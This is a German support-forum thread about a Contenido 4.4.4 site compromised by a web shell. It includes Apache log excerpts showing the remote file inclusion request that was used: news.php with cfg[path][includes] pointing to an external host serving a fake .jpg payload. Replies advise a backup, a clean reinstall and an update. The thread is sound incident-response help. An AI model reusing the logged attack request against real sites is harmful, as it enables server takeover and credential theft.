Wie hier beschrieben: http://contenido.org/forum/viewtopic.php?t=18309 ist in mein Contenido 4.4.4 ein Trojaner installiert worden, es handelt sich um eine russische Hacker-Shell, die u.a. auch schon mein mySQL-Passwort ausgelesen hat. Zum Glück wurde nichts verändert und die Seite auch noch nicht sonstwie mißbraucht. Auf Wunsch kann ich auch einmal die Log-Auszüge hier posten.
Was muss ich (als reiner Anwender!) tun, um meine 4.4.4 dicht zu machen? Gibt es eine Liste der Dateien, die ich austauschen muss?
Danke von einem User, der leider nicht viel Zeit in die Pflege der Installation stecken kann.
sigmahr
Sicherheitslücken stopfen
zunächst müsste man herausfinden, wie das shell auf den server gekommen ist. es gibt da mehrere varianten und die müssen nicht notwendigerweise - obwohl das auch denkbar ist - mit contenido zusammenhängen.
aitsu.org :: schnell - flexibel - komfortabel :: Version 2.2.0 (since June 22, 2011) (jetzt mit dual license GPL/kommerziell)
@kummer
Hier sind Teile der Log-Auszüge, die mir mein Provider geschickt hat. Ich werde da nicht so richtig schlau draus, aber vielleicht kannst du - oder jemand anderes - daraus ableiten, wo genau die Einflugschneise war und was ich austauschen muss. Oder war es ausschließlich die "contenido/external/frontend/news.php"?
@MichFress
Natürlich hast du im Prinzip recht, ich habe aber recht viele angepasste Module, in die ich (als PHP-Laie) viel Zeit investiert hatte. Diese Zeit fehlt mir im Moment absolut, daher möchte ich mir ein Update - mit ungewissem Ausgang - nicht antun.
Danke für weitere Hinweise, sigmahr
Hier sind Teile der Log-Auszüge, die mir mein Provider geschickt hat. Ich werde da nicht so richtig schlau draus, aber vielleicht kannst du - oder jemand anderes - daraus ableiten, wo genau die Einflugschneise war und was ich austauschen muss. Oder war es ausschließlich die "contenido/external/frontend/news.php"?
Code: Alles auswählen
213.140.17.104 - - [25/Aug/2007:18:58:38 +0200] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://odessacharter.iitalia.com/interni/io.jpg?? HTTP/1.1" 200 35408 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" [meine_Domain]
213.140.17.104 - - [25/Aug/2007:18:58:38 +0200] "GET /favicon.ico HTTP/1.1" 200 5062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" [meine_Domain]
213.140.17.104 - - [25/Aug/2007:18:58:38 +0200] "GET /favicon.ico HTTP/1.1" 200 5062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" [meine_Domain]
213.140.17.104 - - [26/Aug/2007:16:03:31 +0200] "POST //contenido/external/frontend/news.php?cfg[path][includes]=http://odessacharter.iitalia.com/interni/io.jpg?? HTTP/1.1" 200 35046 "http://[meine_Domain]//contenido/external/frontend/news.php?cfg[path][includes]=http://odessacharter.iitalia.com/interni/io.jpg??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" [meine_Domain]
...
Natürlich hast du im Prinzip recht, ich habe aber recht viele angepasste Module, in die ich (als PHP-Laie) viel Zeit investiert hatte. Diese Zeit fehlt mir im Moment absolut, daher möchte ich mir ein Update - mit ungewissem Ausgang - nicht antun.
Danke für weitere Hinweise, sigmahr
Es ist die news.php und andere. Du musst mindestens auf die letzte V4.4.x aktualisieren (und zwar mit neuen Verzeichnissen, siehe http://faq.contenido.org -> Handbuch -> ... -> Update).
Gruß
HerrB
Gruß
HerrB
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
Hallo HerrB,
sigmahr
Die letzte 4.4.x läuft meines Wissen schon, leider finde ich aber auch den genauen Abschnitt in der FAQ nicht, wo das mit den neuen Verzeichnissen erklärt ist - oder ich bin einfach zu blöde...Du musst mindestens auf die letzte V4.4.x aktualisieren (und zwar mit neuen Verzeichnissen,
sigmahr
@sigmahr,
das mindeste was du machen mußt, und zwar sehr schnell,
ist das was HerrB dir geschrieben hat.
Mit neuen Verzeichnissen meint er:
alles sichern auf dem Server, - alles Löschen auf den Server - Update auf die letzte 4.4.x
Der Server/deine Homepage ist kompromitiert, und du weißt nicht was alles darauf ist.
Machst du diesen Weg nicht, zu 99,9% gehört der Server/deine Homepage wieder den Scammer, es ist nur eine Frage der Zeit !!!
das mindeste was du machen mußt, und zwar sehr schnell,
ist das was HerrB dir geschrieben hat.
Mit neuen Verzeichnissen meint er:
alles sichern auf dem Server, - alles Löschen auf den Server - Update auf die letzte 4.4.x
Der Server/deine Homepage ist kompromitiert, und du weißt nicht was alles darauf ist.
Machst du diesen Weg nicht, zu 99,9% gehört der Server/deine Homepage wieder den Scammer, es ist nur eine Frage der Zeit !!!
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net